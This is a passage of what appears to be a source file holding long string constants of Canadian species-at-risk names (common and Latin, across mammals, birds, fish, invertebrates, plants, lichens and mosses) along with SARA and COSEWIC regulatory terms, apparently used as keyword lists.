Phrynosoma hernandesi
Massasauga
Sistrurus catenatus
Desert Nightsnake
Hypsiglena chlorophaea
Queensnake
Regina septemvittata
Blue Racer
Coluber constrictor foxii
Gray Ratsnake
Pantherophis spiloides
Leatherback Sea Turtle
Dermochelys coriacea
Leatherback Sea Turtle
Dermochelys coriacea
Loggerhead Sea Turtle
Caretta caretta
Five-lined Skink
Plestiodon fasciatus
Sharp-tailed Snake
Contia tenuis
Spiny Softshell
Apalone spinifera
Blanding\'s Turtle
Emydoidea blandingii
Spotted Turtle
Clemmys guttata
Western Painted Turtle
Chrysemys picta bellii
Broad-banded Forestsnail
Allogona profunda
Oregon Forestsnail
Allogona townsendiana
Proud Globelet
Patera pennsylvanica
Hotwater Physa
Physella wrighti
Island Blue
Plebejus saepiolus insulanus
Aweme Borer
Papaipema aweme
Hoptree Borer
Prays atomocella
Bogbean Buckmoth
Hemileuca sp.
Gypsy Cuckoo Bumble Bee
Bombus bohemicus
Rusty-patched Bumble Bee
Bombus affinis
Taylor\'s Checkerspot
Euphydryas editha taylori
Olive Clubtail
Stylurus olivaceus
Rapids Clubtail
Gomphus quadricolor
Riverine Clubtail
Stylurus amnicola
Skillet Clubtail
Gomphus ventricosus
Hungerford\'s Crawling Water Beetle
Brychius hungerfordi
Macropis Cuckoo Bee
Epeoloides pilosulus
Bert\'s Predaceous Diving Beetle
Sanfilippodytes bertae
Eastern Persius Duskywing
Erynnis persius persius
Okanagan Efferia
Efferia okanagana
Hine\'s Emerald
Somatochlora hineana
White Flower Moth
Schinia bimatris
Gold-edged Gem
Schinia avemensis
Behr\'s Hairstreak
Satyrium behrii
Half-moon Hairstreak
Satyrium semiluna
Mormon Metalmark
Apodemia mormo
Dusky Dune Moth
Copablepharon longipenne
Edwards\' Beach Moth
Anarta edwardsii
Five-spotted Bogus Yucca Moth
Prodoxus quinquepunctellus
Non-pollinating Yucca Moth
Tegeticula corruptrix
Sand-verbena Moth
Copablepharon fuscum
Yucca Moth
Tegeticula yuccasella
Maritime Ringlet
Coenonympha nipisiquit
Dakota Skipper
Hesperia dacotae
Poweshiek Skipperling
Oarisma poweshiek
Ottoe Skipper
Hesperia ottoe
False-foxglove Sun Moth
Pyrrhia aurantiago
Cobblestone Tiger Beetle
Cicindela marginipennis
Northern Barrens Tiger Beetle
Cicindela patruela
Wallis\' Dark Saltflat Tiger Beetle
Cicindela parowana wallisi
Pallid Bat
Antrozous pallidus
Wood Bison
Bison bison athabascae
Woodland Caribou
Rangifer tarandus caribou
Ermine haidarum subspecies
Mustela erminea haidarum
Grey Fox
Urocyon cinereoargenteus
Swift Fox
Vulpes velox
American Marten
Martes americana atrata
Black-tailed Prairie Dog
Cynomys ludovicianus
Short-tailed Birds
Albatross
Phoebastria albatrus
Least Bittern
Ixobrychus exilis
Bobolink
Dolichonyx oryzivorus
Lark Bunting
Calamospiza melanocorys
Red Crossbill percna
percna
Loxia curvirostra percna
Olive-sided Flycatcher
Contopus cooperi
Northern Goshawk laingi
laingi
Accipiter gentilis laingi
Ross\'s Gull
Rhodostethia rosea
Ferruginous Hawk
Buteo regalis
Red Knot roselaari type
Calidris canutus roselaari
roselaari
Chestnut-collared Longspur
Calcarius ornatus
McCown\'s Longspur
Rhynchophanes mccownii
Eastern Meadowlark
Sturnella magna
Marbled Murrelet
Brachyramphus marmoratus
Common Nighthawk
Chordeiles minor
Barn Owl
Tyto alba
Northern Saw-whet Owl brooksi
brooksi
Aegolius acadicus brooksi
Sprague\'s Pipit
Anthus spragueii
Western Screech-owl kennicottii
kennicottii
Megascops kennicottii kennicottii
Megascops kennicottii macfarlanei
Loggerhead Shrike excubitorides
excubitorides
Lanius ludovicianus excubitorides
Bank Swallow
Riparia riparia
Barn Swallow
Hirundo rustica
Chimney Swift
Chaetura pelagica
Bicknell\'s Thrush
Catharus bicknelli
Wood Thrush
Hylocichla mustelina
Canada Warbler
Wilsonia canadensis
Golden-winged Warbler
Vermivora chrysoptera
Louisiana Waterthrush
Parkesia motacilla
Whip-poor-will
Caprimulgus vociferus
Lewis\'s Woodpecker
Melanerpes lewis
Rocky Mountain Tailed Frog
Ascaphus montanus
Western Chorus Frog
Pseudacris triseriata
Coastal Giant Salamander
Dicamptodon tenebrosus
Spring Salamander
Gyrinophilus porphyriticus
Great Basin Spadefoot
Spea intermontana
Great Basin Reptiles
Gophersnake
Pituophis catenifer deserticola
Massasauga
Sistrurus catenatus
Eastern Yellow-bellied Racer
Coluber constrictor flaviventris
Gray Ratsnake
Pantherophis spiloides
Western Rattlesnake
Crotalus oreganos
Eastern Ribbonsnake
Thamnophis sauritus
Eastern Hog-nosed Snake
Heterodon platirhinos
Blanding\'s Turtle
Emydoidea blandingii
Wood Turtle
Glyptemys insculpta
Dromedary Jumping-slug
Hemphillia dromedarius
Blue-grey Taildropper
Prophysaon coeruleum
Verna\'s Flower Moth
Schinia verna
Dun Skipper
Euphyes vestris
Sable Island Sweat Bee
Lasioglossum sablense
Audouin\'s Night-stalking Tiger Beetle
Omus audouini
Gibson\'s Big Sand Tiger Beetle
Cicindela formosa gibsoni
Badger taxus
taxus
Taxidea taxus taxus
Spotted Bat
Euderma maculatum
Grizzly Bear
Ursus arctos
Polar Bear
Ursus maritimus
Mountain Beaver
Aplodontia rufa
Barren-ground Caribou
Rangifer tarandus groenlandicus
Woodland Caribou
Rangifer tarandus caribou
Nuttall\'s Cottontail nuttallii
nuttallii
Sylvilagus nuttallii nuttallii
Eastern Mole
Scalopus aquaticus
Western Harvest Mouse megalotis subspecies
Reithrodontomys megalotis megalotis
Collared Pika
Ochotona collaris
Woodland Vole
Microtus pinetorum
Eastern Wolf
Canis lupus lycaon
Wolverine
Gulo gulo
Black-footed Birds
Albatross
Phoebastria nigripes
Cassin\'s Auklet
Ptychoramphus aleuticus
Rusty Blackbird
Euphagus carolinus
Long-billed Curlew
Numenius americanus
Harlequin Duck
Histrionicus histrionicus
Peregrine Falcon anatum/tundrius
Falco peregrinus anatum/tundrius
Peregrine Falcon pealei subspecies
Falco peregrinus pealei
Barrow\'s Goldeneye
Bucephala islandica
Horned Grebe
Podiceps auritus
Western Grebe
Aechmophorus occidentalis
Evening Grosbeak
Coccothraustes vespertinus
Great Blue Heron fannini
fannini
Ardea herodias fannini
Red Knot islandica subspecies
Calidris canutus islandica
Ancient Murrelet
Synthliboramphus antiquus
Flammulated Owl
Otus flammeolus
Short-eared Owl
Asio flammeus
Red-necked Phalarope
Phalaropus lobatus
Band-tailed Pigeon
Patagioenas fasciata
Yellow Rail
Coturnicops noveboracensis
Buff-breasted Sandpiper
Tryngites subruficollis
Baird\'s Sparrow
Ammodramus bairdii
Grasshopper Sparrow pratensis subspecies
Ammodramus savannarum pratensis
Savannah Sparrow princeps subspecies
Passerculus sandwichensis princeps
Eastern Wood-pewee
Contopus virens
Coastal Tailed Amphibians
Ascaphus truei
Northern Leopard Frog
Lithobates pipiens
Red-legged Frog
Rana aurora
Coeur d\'Alene Salamander
Plethodon idahoensis
Wandering Salamander
Aneides vagrans
Western Tiger Salamander
Ambystoma mavortium
Great Plains Toad
Anaxyrus cognatus
Western Toad
Anaxyrus boreas
Western Toad
Anaxyrus boreas
Rubber Boa
Charina bottae
Milksnake
Lampropeltis triangulum
Western Yellow-bellied Racer
Coluber constrictor mormon
Prairie Rattlesnake
Crotalus viridis
Eastern Ribbonsnake
Thamnophis sauritus
Five-lined Skink
Plestiodon fasciatus
Prairie Skink
Plestiodon septentrionalis
Western Skink
Plestiodon skiltonianus
Eastern Musk Turtle
Sternotherus odoratus
Eastern Painted Turtle
Chrysemys picta picta
Midland Painted Turtle
Chrysemys picta marginata
Northern Map Turtle
Graptemys geographica
Snapping Turtle
Chelydra serpentina
Western Painted Turtle
Chrysemys picta bellii
Lake Erie Watersnake
Nerodia sipedon insularum
Brook Floater
Alasmidonta varicosa
Warty Jumping-slug
Hemphillia glandulosa
Haida Gwaii Slug
Staala gwaii
Pygmy Slug
Kootenaia burkei
Sheathed Slug
Zacoleus idahoensis
Threaded Vertigo
Nearctula sp.
Magnum Mantleslug
Magnipelta mycophaga
Yellow-banded Bumble Bee
Bombus terricola
Vivid Dancer
Argia vivida
Greenish-white Grasshopper
Hypochlora alba
Red-tailed Leafhopper
Aflexia rubranura
Red-tailed Leafhopper
Aflexia rubranura
Mormon Metalmark
Apodemia mormo
Monarch
Danaus plexippus
Pale Yellow Dune Moth
Copablepharon grandis
Sonora Skipper
Polites sonora
Pygmy Snaketail
Ophiogomphus howei
Georgia Basin Bog Spider
Gnaphosa snohomish
Dune Tachinid Fly
Germaria angustata
Weidemeyer\'s Admiral
Limenitis weidemeyerii
orca
Northern Abalone
Haliotis kamtschatkana
Rayed Bean
Villosa fabalis
Fawnsfoot
Truncilla donaciformis
Kidneyshell
Ptychobranchus fasciolaris
Lilliput
Toxolasma parvum
Salamander Mussel
Simpsonaias ambigua
Round Pigtoe
Pleurobema sintoxia
Northern Riffleshell
Epioblasma torulosa rangiana
Banff Springs Snail
Physella johnsoni
Snuffbox
Epioblasma triquetra
Atlantic Mud-piddock
Barnea truncata
Mapleleaf
Quadrula quadrula
Threehorn Wartyback
Obliquaria reflexa
Sea Otter
Enhydra lutris
Harbour Porpoise
Phocoena phocoena
Steller Sea Lion
Eumetopias jubatus
whale
marine mammal
marine organisms
Bowhead Whale
Balaena mysticetus
Fin Whale
Balaenoptera physalus
Grey Whale
Eschrichtius robustus
Humpback Whale
Megaptera novaeangliae
Sowerby\'s Beaked Whale
Mesoplodon bidens
Brook Floater
Alasmidonta varicosa
Wavy-rayed Lampmussel
Lampsilis fasciola
Yellow Lampmussel
Lampsilis cariosa
Mapleleaf
Quadrula quadrula
Rocky Mountain Ridged Mussel
Gonidea angulata
Olympia Oyster
Ostrea lurida
Eastern Pondmussel
Ligumia nasuta
Rainbow
Villosa iris
Harbour Seal Lacs des Loups Marins
Seal
Phoca vitulina mellonae
Pacific Water Shrew
Sorex bendirii
Whale
Beluga Whale
Delphinapterus leucas
Blue Whale
Balaenoptera musculus
Blue Whale
Balaenoptera musculus
Killer Whale
Orcinus orca
North Atlantic Right Whale
Eubalaena glacialis
North Pacific Right Whale
Eubalaena japonica
Northern Bottlenose Whale
Hyperoodon ampullatus
Sei Whale
Balaenoptera borealis
Beluga Whale
Delphinapterus leucas
Fin Whale
Balaenoptera physalus
Killer Whale
Orcinus orca
clam
scallop
butterfly"""
Species_at_Risk = """Species at Risk
Species of Special Status
Rare Species
SARA
s. 73
section 73
Species At Risk Act
Endangered Species
Threatened Species
Endangered Wildlife
Critical Habitat
COSEWIC
Committee on the Status of Endangered Wildlife in Canada
Critical habitat
Designation
Schedule 1
At Risk
Endangered
Critical timing window
Restricted activity period
Canadian Wildlife Service
CWS
Recovery Strategy
Action Plan
Permit
Caribou
Bat
special conservation status
American Badger jacksoni
jacksoni
Badger
Taxidea taxus jacksoni
American Badger jeffersonii
Taxidea taxus jeffersonii
American Badger jeffersonii
jeffersonii
Taxidea taxus jeffersonii
Tri-coloured Bat
Perimyotis subflavus
Peary Caribou
Caribou
Rangifer tarandus pearyi
Woodland Caribou
Rangifer tarandus caribou
Ord\'s Kangaroo Rat
Dipodomys ordii
Vancouver Island Marmot
Marmota vancouverensis
Townsend\'s Mole
Scapanus townsendii
Western Harvest Mouse dychei
dychei
Reithrodontomys megalotis dychei
Little Brown Myotis
Myotis
Myotis lucifugus
Northern Myotis
Myotis septentrionalis
Harbour Seal Lacs des Loups Marins
Seal
Phoca vitulina mellonae
Pacific Water Shrew
Sorex bendirii
Whale
Beluga Whale
Delphinapterus leucas
Blue Whale
Balaenoptera musculus
Blue Whale
Balaenoptera musculus
Killer Whale
Orcinus orca
North Atlantic Right Whale
Eubalaena glacialis
North Pacific Right Whale
Eubalaena japonica
Northern Bottlenose Whale
Hyperoodon ampullatus
Sei Whale
Balaenoptera borealis
Northern Bobwhite
Colinus virginianus
Yellow-breasted Chat auricollis
auricollis
Icteria virens auricollis
Yellow-breasted Chat virens
virens
Icteria virens virens
Whooping Crane
Grus americana
Eskimo Curlew
Numenius borealis
Acadian Flycatcher
Empidonax virescens
Horned Grebe
Podiceps auritus
Ivory Gull
Pagophila eburnea
Red Knot rufa
rufa
Calidris canutus rufa
Streaked Horned Lark
Eremophila alpestris strigata
Barn Owl
Tyto alba
Burrowing Owl
Athene cunicularia
Spotted Owl caurina
caurina
Strix occidentalis caurina
Mountain Plover
Charadrius montanus
Piping Plover circumcinctus
circumcinctus
Charadrius melodus circumcinctus
Piping Plover melodus
melodus
Charadrius melodus melodus
King Rail
Rallus elegans
Greater Sage-Grouse urophasianus subspecies
Centrocercus urophasianus urophasianus
Williamson\'s Sapsucker
Sphyrapicus thyroideus
Pink-footed Shearwater
Ardenna creatopus
Loggerhead Shrike migrans
migrans
Lanius ludovicianus migrans
Coastal Vesper Sparrow
Pooecetes gramineus affinis
Henslow\'s Sparrow
Ammodramus henslowii
Black Swift
Cypseloides niger
Roseate Tern
Sterna dougallii
Sage Thrasher
Oreoscoptes montanus
Cerulean Warbler
Setophaga cerulea
Kirtland\'s Warbler
Dendroica kirtlandii
Prothonotary Warbler
Protonotaria citrea
Red-headed Woodpecker
Melanerpes erythrocephalus
White-headed Woodpecker
Picoides albolarvatus
Cricket Frog
Acris blanchardi
Northern Leopard Frog
Lithobates pipiens
Oregon Spotted Frog
Rana pretiosa
Allegheny Mountain Dusky Salamander
Desmognathus ochrophaeus
Allegheny Mountain Dusky Salamander
Desmognathus ochrophaeus
Eastern Tiger Salamander
Ambystoma tigrinum
Jefferson Salamander
Ambystoma jeffersonianum
Northern Dusky Salamander
Desmognathus fuscus
Small-mouthed Salamander
Ambystoma texanum
Western Tiger Salamander
Ambystoma mavortium
Fowler\'s Toad
Anaxyrus fowleri
Eastern Reptiles
Foxsnake
Pantherophis gloydi
Eastern Foxsnake
Pantherophis gloydi
Butler\'s Gartersnake
Thamnophis butleri
Greater Short-horned Lizard
Phrynosoma hernandesi
Massasauga
Sistrurus catenatus
Desert Nightsnake
Hypsiglena chlorophaea
Queensnake
Regina septemvittata
Blue Racer
Coluber constrictor foxii
Gray Ratsnake
Pantherophis spiloides
Leatherback Sea Turtle
Dermochelys coriacea
Leatherback Sea Turtle
Dermochelys coriacea
Loggerhead Sea Turtle
Caretta caretta
Five-lined Skink
Plestiodon fasciatus
Sharp-tailed Snake
Contia tenuis
Spiny Softshell
Apalone spinifera
Blanding\'s Turtle
Emydoidea blandingii
Spotted Turtle
Clemmys guttata
Western Painted Turtle
Chrysemys picta bellii
Striped Bass
Morone saxatilis
Silver Chub
Macrhybopsis storeriana
Lake Chubsucker
Erimyzon sucetta
Shortnose Cisco
Coregonus reighardi
Spring Cisco
Coregonus sp.
Nooksack Dace
Rhinichthys cataractae ssp.
Redside Dace
Clinostomus elongatus
Speckled Dace
Rhinichthys osculus
Channel Darter
Percina copelandi
Channel Darter
Percina copelandi
Spotted Gar
Lepisosteus oculatus
Western Brook Lamprey
Lampetra richardsoni
Northern Madtom
Noturus stigmosus
Copper Redhorse
Moxostoma hubbsi
Atlantic Salmon
Salmo salar
Basking Shark
Cetorhinus maximus
White Shark
Carcharodon carcharias
Carmine Shiner
Notropis percobromus
Rainbow Smelt
Osmerus mordax
Rainbow Smelt
Osmerus mordax
Enos Lake Benthic Threespine Stickleback
Gasterosteus aculeatus
Enos Lake Limnetic Threespine Stickleback
Misty Lake Lentic Threespine Stickleback
Misty Lake Lotic Threespine Stickleback
Vananda Creek Benthic Threespine Stickleback
Vananda Creek Limnetic Threespine Stickleback
Gasterosteus aculeatus
White Sturgeon
Acipenser transmontanus
Rainbow Trout
Oncorhynchus mykiss
Atlantic Whitefish
Coregonus huntsmani
Northern Molluscs
Abalone
Haliotis kamtschatkana
Rayed Bean
Villosa fabalis
Fawnsfoot
Truncilla donaciformis
Broad-banded Forestsnail
Allogona profunda
Oregon Forestsnail
Allogona townsendiana
Proud Globelet
Patera pennsylvanica
Hickorynut
Obovaria olivaria
Round Hickorynut
Obovaria subrotunda
Kidneyshell
Ptychobranchus fasciolaris
Lilliput
Toxolasma parvum
Salamander Mussel
Simpsonaias ambigua
Hotwater Physa
Physella wrighti
Round Pigtoe
Pleurobema sintoxia
Northern Riffleshell
Epioblasma torulosa rangiana
Banff Springs Snail
Physella johnsoni
Snuffbox
Epioblasma triquetra
Island Blue
Plebejus saepiolus insulanus
Aweme Borer
Papaipema aweme
Hoptree Borer
Prays atomocella
Bogbean Buckmoth
Hemileuca sp.
Gypsy Cuckoo Bumble Bee
Bombus bohemicus
Rusty-patched Bumble Bee
Bombus affinis
Taylor\'s Checkerspot
Euphydryas editha taylori
Olive Clubtail
Stylurus olivaceus
Rapids Clubtail
Gomphus quadricolor
Riverine Clubtail
Stylurus amnicola
Skillet Clubtail
Gomphus ventricosus
Hungerford\'s Crawling Water Beetle
Brychius hungerfordi
Macropis Cuckoo Bee
Epeoloides pilosulus
Bert\'s Predaceous Diving Beetle
Sanfilippodytes bertae
Eastern Persius Duskywing
Erynnis persius persius
Okanagan Efferia
Efferia okanagana
Hine\'s Emerald
Somatochlora hineana
White Flower Moth
Schinia bimatris
Gold-edged Gem
Schinia avemensis
Behr\'s Hairstreak
Satyrium behrii
Half-moon Hairstreak
Satyrium semiluna
Mormon Metalmark
Apodemia mormo
Dusky Dune Moth
Copablepharon longipenne
Edwards\' Beach Moth
Anarta edwardsii
Five-spotted Bogus Yucca Moth
Prodoxus quinquepunctellus
Non-pollinating Yucca Moth
Tegeticula corruptrix
Sand-verbena Moth
Copablepharon fuscum
Yucca Moth
Tegeticula yuccasella
Maritime Ringlet
Coenonympha nipisiquit
Dakota Skipper
Hesperia dacotae
Poweshiek Skipperling
Oarisma poweshiek
Ottoe Skipper
Hesperia ottoe
False-foxglove Sun Moth
Pyrrhia aurantiago
Cobblestone Tiger Beetle
Cicindela marginipennis
Northern Barrens Tiger Beetle
Cicindela patruela
Wallis\' Dark Saltflat Tiger Beetle
Cicindela parowana wallisi
Gattinger\'s Agalinis
Agalinis gattingeri
Rough Agalinis
Agalinis aspera
Skinner\'s Agalinis
Agalinis skinneriana
Scarlet Ammannia
Ammannia robusta
Short-rayed Alkali Aster
Symphyotrichum frondosum
Eastern Mountain Avens
Geum peckii
Deltoid Balsamroot
Balsamorhiza deltoidea
Tall Beakrush
Rhynchospora macrostachya
Cherry Birch
Betula lenta
Bluehearts
Buchnera americana
Fernald\'s Braya
Braya fernaldii
Hairy Braya
Braya pilosa
Long\'s Braya
Braya longii
Tall Bugbane
Actaea elata
Bashful Bulrush
Trichophorum planifolium
Slender Bush-clover
Lespedeza virginica
California Buttercup
Ranunculus californicus
Water-plantain Buttercup
Ranunculus alismifolius
Butternut
Juglans cinerea
Eastern Prickly Pear Cactus
Opuntia humifusa
Spalding\'s Campion
Silene spaldingii
Coastal Scouler\'s Catchfly
Silene scouleri grandis
Muhlenberg\'s Centaury
Centaurium muehlenbergii
American Chestnut
Castanea dentata
Colicroot
Aletris farinosa
Slender Collomia
Collomia tenella
American Columbo
Frasera caroliniensis
Pink Coreopsis
Coreopsis rosea
Eastern Flowering Dogwood
Cornus florida
Contorted-pod Evening-primrose
Camissonia contorta
Southern Maidenhair Fern
Adiantum capillus-veneris
Eastern Prairie Fringed-orchid
Platanthera leucophaea
Western Prairie Fringed-orchid
Platanthera praeclara
Plymouth Gentian
Sabatia kennedyana
White Prairie Gentian
Gentiana alba
American Ginseng
Panax quinquefolius
Virginia Goat\'s-rue
Tephrosia virginiana
Showy Goldenrod
Solidago speciosa
Rayless Goldfields
Lasthenia glaberrima
Forked Three-awned Grass
Aristida basiramea
Fascicled Ironweed
Vernonia fasciculata
Tweedy\'s Lewisia
Lewisiopsis tweedyi
Small-flowered Lipocarpha
Lipocarpha micrantha
Seaside Birds-foot Lotus
Lotus formosissimus
Furbish\'s Lousewort
Pedicularis furbishiae
Dense-flowered Lupine
Lupinus densiflorus
Prairie Lupine
Lupinus lepidus
Streambank Lupine
Lupinus rivularis
Virginia Mallow
Sida hermaphrodita
White Meconella
Meconella oregana
Coast Microseris
Microseris bigelovii
Pink Milkwort
Polygala incarnata
Hoary Mountain-mint
Pycnanthemum incanum
Red Mulberry
Morus rubra
Phantom Orchid
Cephalanthera austiniae
Bearded Owl-clover
Triphysaria versicolor
Grand Coulee Owl-clover
Orthocarpus barbatus
Rosy Owl-clover
Orthocarpus bracteosus
Victoria\'s Owl-clover
Castilleja victoriae
Golden Paintbrush
Castilleja levisecta
Branched Phacelia
Phacelia ramosissima
Whitebark Pine
Pinus albicaulis
Heart-leaved Plantain
Plantago cordata
Large Whorled Pogonia
Isotria verticillata
Nodding Pogonia
Triphora trianthophora
Small Whorled Pogonia
Isotria medeoloides
Ogden\'s Pondweed
Potamogeton ogdenii
Fragrant Popcornflower
Plagiobothrys figuratus
Stoloniferous Pussytoes
Antennaria flagellaris
Engelmann\'s Quillwort
Isoetes engelmannii
Quebec Rockcress
Boechera quebecensis
Kellogg\'s Rush
Juncus kelloggii
Pink Sand-verbena
Abronia umbellata
Small-flowered Sand-verbena
Tripterocalyx micranthus
Dwarf Sandwort
Minuartia pusilla
False Hop Sedge
Carex lupuliformis
Foothill Sedge
Carex tumulicola
Juniper Sedge
Carex juniperorum
Lindley\'s False Silverpuffs
Uropappus lindleyi
Brook Spike-primrose
Epilobium torreyi
Dense Spike-primrose
Epilobium densiflorum
Bent Spike-rush
Eleocharis geniculata
Bent Spike-rush
Eleocharis geniculata
Horsetail Spike-rush
Eleocharis equisetoides
Thread-leaved Sundew
Drosera filiformis
Small-flowered Tonella
Tonella tenella
Toothcup
Rotala ramosior
Cucumber Tree
Magnolia acuminata
Bog Bird\'s-foot Trefoil
Lotus pinnatus
Drooping Trillium
Trillium flexipes
Howell\'s Triteleia
Triteleia howellii
Bird\'s-foot Violet
Viola pedata
Yellow Montane Violet praemorsa
praemorsa
Viola praemorsa ssp. praemorsa
Barrens Willow
Salix jejuna
Spotted Wintergreen
Chimaphila maculata
Wood-poppy
Stylophorum diphyllum
Tall Woolly-heads
Psilocarphus elatior
Dwarf Woolly-heads
Psilocarphus brevissimus
Batwing Vinyl Lichen
Leptogium platynum
Boreal Felt Lichen
Erioderma pedicellatum
Pale-bellied Frost Lichen
Physconia subpallida
Seaside Centipede Lichen
Heterodermia sitchensis
Vole Ears Lichen
Erioderma mollissimum
Rusty Cord-moss
Entosthodon rubiginosus
Acuteleaf Small Limestone Moss
Seligeria acutifolia
Margined Streamside Moss
Scouleria marginata
Nugget Moss
Microbryum vlassovii
Poor Pocket Moss
Fissidens pauperculus
Rigid Apple Moss
Bartramia stricta
Roell\'s Brotherella Moss
Brotherella roellii
Silver Hair Moss
Fabronia pusilla
Pallid Bat
Antrozous pallidus
Wood Bison
Bison bison athabascae
Woodland Caribou
Rangifer tarandus caribou
Ermine haidarum subspecies
Mustela erminea haidarum
Grey Fox
Urocyon cinereoargenteus
Swift Fox
Vulpes velox
American Marten
Martes americana atrata
Black-tailed Prairie Dog
blacktailed prairie dog
dog
cat
Cynomys ludovicianus
Beluga Whale
Delphinapterus leucas
Fin Whale
Balaenoptera physalus
Killer Whale
Orcinus orca
Short-tailed Birds
Albatross
Phoebastria albatrus
Least Bittern
Ixobrychus exilis
Bobolink
Dolichonyx oryzivorus
Lark Bunting
Calamospiza melanocorys
Red Crossbill percna
percna
Loxia curvirostra percna
Olive-sided Flycatcher
Contopus cooperi
Northern Goshawk laingi
laingi
Accipiter gentilis laingi
Ross\'s Gull
Rhodostethia rosea
Ferruginous Hawk
Buteo regalis
Red Knot roselaari type
Calidris canutus roselaari
roselaari
Chestnut-collared Longspur
Calcarius ornatus
McCown\'s Longspur
Rhynchophanes mccownii
Eastern Meadowlark
Sturnella magna
Marbled Murrelet
Brachyramphus marmoratus
Common Nighthawk
Chordeiles minor
Barn Owl
Tyto alba
Northern Saw-whet Owl brooksi
brooksi
Aegolius acadicus brooksi
Sprague\'s Pipit
Anthus spragueii
Western Screech-owl kennicottii
kennicottii
Megascops kennicottii kennicottii
Megascops kennicottii macfarlanei
Loggerhead Shrike excubitorides
excubitorides
Lanius ludovicianus excubitorides
Bank Swallow
Riparia riparia
Barn Swallow
Hirundo rustica
Chimney Swift
Chaetura pelagica
Bicknell\'s Thrush
Catharus bicknelli
Wood Thrush
Hylocichla mustelina
Canada Warbler
Wilsonia canadensis
Golden-winged Warbler
Vermivora chrysoptera
Louisiana Waterthrush
Parkesia motacilla
Whip-poor-will
Caprimulgus vociferus
Lewis\'s Woodpecker
Melanerpes lewis
Rocky Mountain Tailed Frog
Ascaphus montanus
Western Chorus Frog
Pseudacris triseriata
Coastal Giant Salamander
Dicamptodon tenebrosus
Spring Salamander
Gyrinophilus porphyriticus
Great Basin Spadefoot
Spea intermontana
Great Basin Reptiles
Gophersnake
Pituophis catenifer deserticola
Massasauga
Sistrurus catenatus
Eastern Yellow-bellied Racer
Coluber constrictor flaviventris
Gray Ratsnake
Pantherophis spiloides
Western Rattlesnake
Crotalus oreganus
Eastern Ribbonsnake
Thamnophis sauritus
Eastern Hog-nosed Snake
Heterodon platirhinos
Blanding\'s Turtle
Emydoidea blandingii
Wood Turtle
Glyptemys insculpta
Eastern Sand Darter
Ammocrypta pellucida
Eastern Sand Darter
Ammocrypta pellucida
Vancouver Lamprey
Entosphenus macrostomus
Plains Minnow
Hybognathus placitus
Pugnose Minnow
Opsopoeodus emiliae
Western Silvery Minnow
Hybognathus argyritis
Black Redhorse
Moxostoma duquesnei
Coastrange Sculpin
Cottus aleuticus
Rocky Mountain Sculpin
Cottus sp.
Pugnose Shiner
Notropis anogenus
Silver Shiner
Notropis photogenis
Spotted Wolffish
Anarhichas minor
Mountain Sucker
Catostomus platyrhynchus
Salish Sucker
Catostomus sp. cf. catostomus
Bull Trout
Salvelinus confluentus
Westslope Cutthroat Trout
Oncorhynchus clarkii lewisi
Northern Wolffish
Anarhichas denticulatus
Atlantic Mud-piddock
Barnea truncata
Dromedary Jumping-slug
Hemphillia dromedarius
Mapleleaf
Quadrula quadrula
Blue-grey Taildropper
Prophysaon coeruleum
Threehorn Wartyback
Obliquaria reflexa
Verna\'s Flower Moth
Schinia verna
Dun Skipper
Euphyes vestris
Sable Island Sweat Bee
Lasioglossum sablense
Audouin\'s Night-stalking Tiger Beetle
Omus audouini
Gibson\'s Big Sand Tiger Beetle
Cicindela formosa gibsoni
Griscom’s Arnica
Arnica griscomii ssp. griscomii
Anticosti Aster
Symphyotrichum anticostense
Gulf of St. Lawrence Aster
Symphyotrichum laurentianum
Western Silvery Aster
Symphyotrichum sericeum
White Wood Aster
Eurybia divaricata
Willowleaf Aster
Symphyotrichum praealtum
Eastern Baccharis
Baccharis halimifolia
Branched Bartonia
Bartonia paniculata ssp. paniculata
Dense Blazing Star
Liatris spicata
Kentucky Coffee-tree
Gymnocladus dioicus
Tiny Cryptantha
Cryptantha minima
Lakeside Daisy
Hymenoxys herbacea
Deerberry
Vaccinium stamineum
Gray\'s Desert-parsley
Lomatium grayi
Lemmon\'s Holly Fern
Polystichum lemmonii
Mountain Holly Fern
Polystichum scopulinum
Victorin\'s Gentian
Gentianopsis virgata ssp. victorinii
Showy Goldenrod
Solidago speciosa
Goldenseal
Hydrastis canadensis
Smooth Goosefoot
Chenopodium subglabrum
Round-leaved Greenbrier
Smilax rotundifolia
Dwarf Hackberry
Celtis tenuifolia
Wild Hyacinth
Camassia scilloides
Van Brunt\'s Jacob’s-ladder
Polemonium vanbruntiae
Small White Lady\'s-slipper
Cypripedium candidum
Hare-footed Locoweed
Oxytropis lagopus
Macoun\'s Meadowfoam
Limnanthes macounii
Mexican Mosquito-fern
Azolla mexicana
Slender Mouse-ear-cress
Halimolobos virgata
Cliff Paintbrush
Castilleja rupicola
Sweet Pepperbush
Clethra alnifolia
Showy Phlox
Phlox speciosa ssp. occidentalis
Slender Popcornflower
Plagiobothrys tenellus
Bolander\'s Quillwort
Isoetes bolanderi
False Rue-anemone
Enemion biternatum
Bear\'s-foot Sanicle
Sanicula arctopoides
Purple Sanicle
Sanicula bipinnatifida
Soapweed
Yucca glauca
Western Spiderwort
Tradescantia occidentalis
Hill\'s Thistle
Cirsium hillii
Toothcup
Rotala ramosior
Purple Twayblade
Liparis liliifolia
American Water-willow
Justicia americana
Green-scaled Willow
Salix chlorolepis
Blunt-lobed Woodsia
Woodsia obtusa
Seaside Bone
Hypogymnia heterophylla
Black-foam Lichen
Anzia colpodes
Crumpled Tarpaper Lichen
Collema coniophilum
Wrinkled Shingle Lichen
Pannaria lurida
Eastern Waterfan
Peltigera hydrothyria
Porsild\'s Bryum
Mielichhoferia macrocarpa
Alkaline Wing-nerved Moss
Pterygoneurum kozlovii
Haller\'s Apple Moss
Bartramia halleriana
Spoon-leaved Moss
Bryoandersonia illecebra
Badger taxus
taxus
Taxidea taxus taxus
Spotted Bat
Euderma maculatum
Grizzly Bear
Ursus arctos
Polar Bear
Ursus maritimus
Mountain Beaver
Aplodontia rufa
Barren-ground Caribou
Rangifer tarandus groenlandicus
Woodland Caribou
Rangifer tarandus caribou
Nuttall\'s Cottontail nuttallii
nuttallii
Sylvilagus nuttallii nuttallii
Eastern Mole
Scalopus aquaticus
Western Harvest Mouse megalotis subspecies
Reithrodontomys megalotis megalotis
Sea Otter
Enhydra lutris
Collared Pika
Ochotona collaris
Harbour Porpoise
Phocoena phocoena
Steller Sea Lion
Eumetopias jubatus
Woodland Vole
Microtus pinetorum
Bowhead Whale
Balaena mysticetus
Fin Whale
Balaenoptera physalus
Grey Whale
Eschrichtius robustus
Humpback Whale
Megaptera novaeangliae
Sowerby\'s Beaked Whale
Mesoplodon bidens
Eastern Wolf
Canis lupus lycaon
Wolverine
Gulo gulo
